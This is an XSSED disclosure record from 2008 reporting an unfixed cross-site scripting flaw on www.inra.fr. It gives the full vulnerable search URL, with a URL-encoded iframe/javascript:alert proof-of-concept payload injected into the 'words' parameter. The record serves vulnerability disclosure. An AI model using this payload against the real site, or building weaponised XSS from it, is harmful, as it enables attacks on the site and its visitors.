Unfixed XSS vulnerability at www.inra.fr

2008-07-06T00:00:00
ID XSSED:41269
Type xssed
Reporter Zeryus
Modified 2008-07-06T00:00:00

Description

Security researcher Zeryus submitted a cross-site scripting (XSS) vulnerability affecting www.inra.fr on 07/06/2008. At the time of submission, the site ranked 31238 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.inra.fr/cgi-bin/admin/htdig/htsearch?restrict=http%3A%2F%2Fwww.inra.fr%2Fdrh%2F&method=and&format=builtin_long&matchesperpages=25&sort=score&config=htsearch_webINRA&exclude=&words=%3Ciframe+name%3D%27%27+SRC%3D%27javascript%3Aalert%28157%29%27+scrolling%3D%27yes%27+height%3D%27220%27+width%3D%27180%27+FRAMEBORDER%3D%27yes%27%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS+by+Zeryus%3C%2Fh1%3E%3C%2Fmarquee%3E&submit=Ok